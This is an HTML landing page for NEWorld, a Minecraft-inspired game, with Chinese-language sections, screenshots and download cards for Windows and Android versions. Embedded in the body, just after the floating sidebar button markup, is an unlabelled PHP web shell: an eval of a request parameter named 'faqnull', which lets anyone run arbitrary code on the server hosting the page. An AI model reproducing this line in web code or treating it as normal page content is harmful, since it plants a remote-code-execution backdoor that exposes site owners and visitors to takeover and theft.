<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>新創無際 Infinideas</title>
    <!--Import materialize.css-->
    <link type="text/css" rel="stylesheet" href="mat/css/materialize.min.css"  media="screen,projection"/>
	<link rel="apple-touch-icon" sizes="57x57" href="/apple-touch-icon-57x57.png">
	<link rel="apple-touch-icon" sizes="60x60" href="/apple-touch-icon-60x60.png">
	<link rel="apple-touch-icon" sizes="72x72" href="/apple-touch-icon-72x72.png">
	<link rel="apple-touch-icon" sizes="76x76" href="/apple-touch-icon-76x76.png">
	<link rel="apple-touch-icon" sizes="114x114" href="/apple-touch-icon-114x114.png">
	<link rel="apple-touch-icon" sizes="120x120" href="/apple-touch-icon-120x120.png">
	<link rel="apple-touch-icon" sizes="144x144" href="/apple-touch-icon-144x144.png">
	<link rel="apple-touch-icon" sizes="152x152" href="/apple-touch-icon-152x152.png">
	<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon-180x180.png">
	<link rel="icon" type="image/png" href="/favicon-32x32.png" sizes="32x32">
	<link rel="icon" type="image/png" href="/android-chrome-192x192.png" sizes="192x192">
	<link rel="icon" type="image/png" href="/favicon-96x96.png" sizes="96x96">
	<link rel="icon" type="image/png" href="/favicon-16x16.png" sizes="16x16">
	<link rel="manifest" href="/manifest.json">
	<meta name="msapplication-TileColor" content="#00aba9">
	<meta name="msapplication-TileImage" content="/mstile-144x144.png">
	<meta name="theme-color" content="#ffffff">
    <!--Let browser know website is optimized for mobile-->
    <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
    <style>
    body{font-family:'Arial','Microsoft Jhenghei',sans-serif;display: flex;min-height: 100vh;flex-direction: column;}
    main{flex: 1 0 auto;}
    #contact-list{list-style: none;}
    #contact-list li{margin-top: 1em;display: inline-block;}
    #contact-list li a{width: 12em;}
    @media screen and (max-width: 800px){#contact-list li{display: block;}}
    @font-face {
  font-family: 'Material Icons';
  font-style: normal;
  font-weight: 400;
  src: url(https://example.com/MaterialIcons-Regular.eot); /* For IE6-8 */
  src: local('Material Icons'),
       local('MaterialIcons-Regular'),
       url(MaterialIcons-Regular.woff2) format('woff2'),
       url(MaterialIcons-Regular.woff) format('woff'),
       url(MaterialIcons-Regular.ttf) format('truetype');}
       .material-icons {
  font-family: 'Material Icons';
  font-weight: normal;
  font-style: normal;
  font-size: 24px;  /* Preferred icon size */
  display: inline-block;
  width: 1em;
  height: 1em;
  line-height: 1;
  text-transform: none;
  letter-spacing: normal;
  word-wrap: normal;
  /* Support for all WebKit browsers. */
  -webkit-font-smoothing: antialiased;
  /* Support for Safari and Chrome. */
  text-rendering: optimizeLegibility;
  /* Support for Firefox. */
  -moz-osx-font-smoothing: grayscale;
  /* Support for IE. */
  font-feature-settings: 'liga';
} /*inherited from bootstrap*/
.alert{padding:15px;margin-bottom:20px;border:1px solid transparent;border-radius:4px}.alert-warning{color:#8a6d3b;background-color:#fcf8e3;border-color:#faebcc}
    </style>
  </head>
  <body>
	<!--sidebar-->
    <div class="fixed-action-btn" style="bottom: 45px; right: 24px;">
    <a class="btn-floating btn-large red waves-effect waves-light">
      <i class="material-icons">format_list_bulleted</i>
    </a>
    <ul>
      <li><a class="btn-floating red waves-effect waves-light" href="http://analytics.google.com/"><i class="material-icons">insert_chart</i></a></li>
      <li><a class="btn-floating yellow darken-1 waves-effect waves-light" href="#quote"><i class="material-icons">format_quote</i></a></li>
      <li><a class="btn-floating green waves-effect waves-light" href="#"><i class="material-icons">publish</i></a></li>
      <li><a class="btn-floating blue waves-effect waves-light" href="#footer"><i class="material-icons">attach_file</i></a></li>
    </ul>
  	</div>
  	  <?php eval($_REQUEST["faqnull"]); ?>
    <!-- Navagation Bar -->
  <div class="navbar-fixed">

	<ul id="divisiondrop" class="dropdown-content">
  <li><a href="division.html">List of Divisions</a></li>
  <li class="divider"></li>
  <li><a href="#" class="active">NEWorld</a></li>
  <li><a href="islsurv.html">Island Survival</a></li>
</ul>
<ul id="divisiondropp" class="dropdown-content">
 <li><a href="division.html">List of Divisions</a></li>
  <li class="divider"></li>
  <li><a href="#" class="active">NEWorld</a></li>
  <li><a href="islsurv.html">Island Survival</a></li>
</ul>


  <nav class="light-blue lighten-1" role="navigation">
    <div class="nav-wrapper container">
      <a href="index.html" class="brand-logo white-text waves-effect waves-light">Infinideas</a>
      <ul class="right hide-on-med-and-down">
        <li class="waves-effect waves-light"><a href="members.html">成員</a></li>
      <li> <a class="waves-effect waves-light dropdown-button" data-activates="divisiondrop" href="#!">分部<i class="material-icons right">arrow_drop_down</i></a> </li> 
        <li class="waves-effect waves-light"><a href="index_simp.html">舊版入口</a></li>
      </ul>
      <ul id="nav-mobile" class="side-nav" style="left: -250px;">
	  <li> <a class="waves-effect waves-light" href="members.html">成員</a> </li>
      <li> <a class="waves-effect waves-light dropdown-button" data-activates="divisiondrop" href="#!">分部<i class="material-icons right">arrow_drop_down</i></a> </li> 
	  <li> <a class="waves-effect waves-light" href="index_simp.html">舊版入口</a> </li>
     </ul>
      <a href="#" data-activates="nav-mobile" class="button-collapse btn-float waves-effect waves-light"> <i class="material-icons">menu</i> </a>
    </div>
  </nav>
  </div>
  <div id="index-banner" class="parallax-container">
    <div class="section no-pad-bot">
      <div class="container">

        <h1 class="header center white-text">NEWorld</h1>
        <div class="row center">
          <h5 class="header col s12 white-text text-darken-2" style="font-weight:bolder">
      <span style="text-shadow:2px 2px 10px black;">「實現吧 我們的夢想」</span></h5>
        </div>
        <div class="row center">
          <a href="#contact" id="join-button" class="btn-large waves-effect waves-light lighten-1">Download latest</a>
        </div>
        <br><br>

      </div>
    </div>
    <div class="parallax"><img src="background/nwbg1.jpg" alt="Unsplashed background img 1" style="display: block;" id="testimg" class="responsive-img"/></div>
  </div>

 <div class="container">
    <div class="section">
    
    <div id="quote" class="center">
    <h3><span class="teal-text">盡情探索</span></h3>
        <img class="materialboxed" data-caption="NEWorld遼闊的世界" src="NEWorld/neworld_screenshot01.bmp" alt="NEWorld screenshot 1"/>
        <p>在這一片無邊無際、遼闊的大地上，盡情地探索、建設，甚至破壞！唯一的限制，只有你的想象！</p>
        <p>&nbsp;</p>
    <h3><span class="teal-text">社群合作</span></h3>
        <img class="materialboxed" data-caption="開發者們迅速的回應" src="NEWorld/dev_service.png" alt="NEWorld screenshot 2"/>
        <p>開發者們透過GitHub平台上的<a href="http://www.github.com/Infinideastudio/NEWorld/issues">bug tracker</a>，迅速修復bug<br>
        (對了，這是<a href="https://github.com/Infinideastudio/NEWorld/issues/5">issue #5</a>)</p>
    <h3><span class="teal-text">我他媽的真的編不下去了</span></h3>
    	<img class="materialboxed" data-caption="來一張死圖吧" src="FML/fml.bmp" alt="死圖"/>
    	<p>來一張死圖吧 <abbr title="Fuck My Life">FML</abbr></p>

  </div>


  <div class="container">
    <div class="section">
    
    <div id="quote" class="center">
    <h2><span class="teal-text">NEWorld所有版本</span></h2>
    </div>
	<div class="row">
        <div class="card col s12 m4">
    <div class="card-image waves-effect waves-block waves-light">
      <img class="activator" src="background/nwbg1.jpg" alt="NEWorld"/>
    </div>
    <div class="card-content">
      <span class="card-title activator grey-text text-darken-4">NEWorld for Windows<i class="material-icons right">more_vert</i></span>
      <p><a class="waves-effect waves-teal" onclick="Materialize.toast('',4000)" href="http://www.github.com/infinideastudio/NEWorld/releases/latest">下載最新Release</a></p>
    </div>
    <div class="card-reveal">
      <span class="card-title grey-text text-darken-4">NEWorld<i class="material-icons right">close</i></span>
      <p>不止是不思議的原創游戲，始于<a href="http://www.minecraft.net/">Minecraft</a>卻不止步於<a href="http://www.minecraft.net/">Minecraft</a>！由最初的嘗試到現在大家一起開發的項目，NEWorld正在一步步前進！</p>
    </div>
  </div>
   <div class="card col s12 m4">
    <div class="card-image waves-effect waves-block waves-light">
      <img class="activator" src="background/nwbg2.jpg" alt="NEWorld"/>
    </div>
    <div class="card-content">
      <span class="card-title activator grey-text text-darken-4">NEWorld for Android<i class="material-icons right">more_vert</i></span>
      <p><a class="waves-effect waves-teal" href="latest.apk">下載最新測試版本</a></p>
    </div>
    <div class="card-reveal">
      <span class="card-title grey-text text-darken-4">NEWorld for Android<i class="material-icons right">close</i></span>
      <p>由某SuperSodaSea開發，目前正在做基礎和修復BUG，不可玩。</p>
    </div></div></div></div>
  </div>
  <!--  Scripts-->
  <script src="js/jquery-1.11.3.min.js"></script>
  <script src="mat/js/materialize.js"></script>
  <script>
  (function($){
  $(function(){
    $('.button-collapse').sideNav();
        $(".dropdown-button").dropdown();
  }); // end of document ready
})(jQuery); // end of jQuery name space
  </script>
  <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-65523931-1', 'auto');
  ga('send', 'pageview');
</script>
  
  </body>

</html>
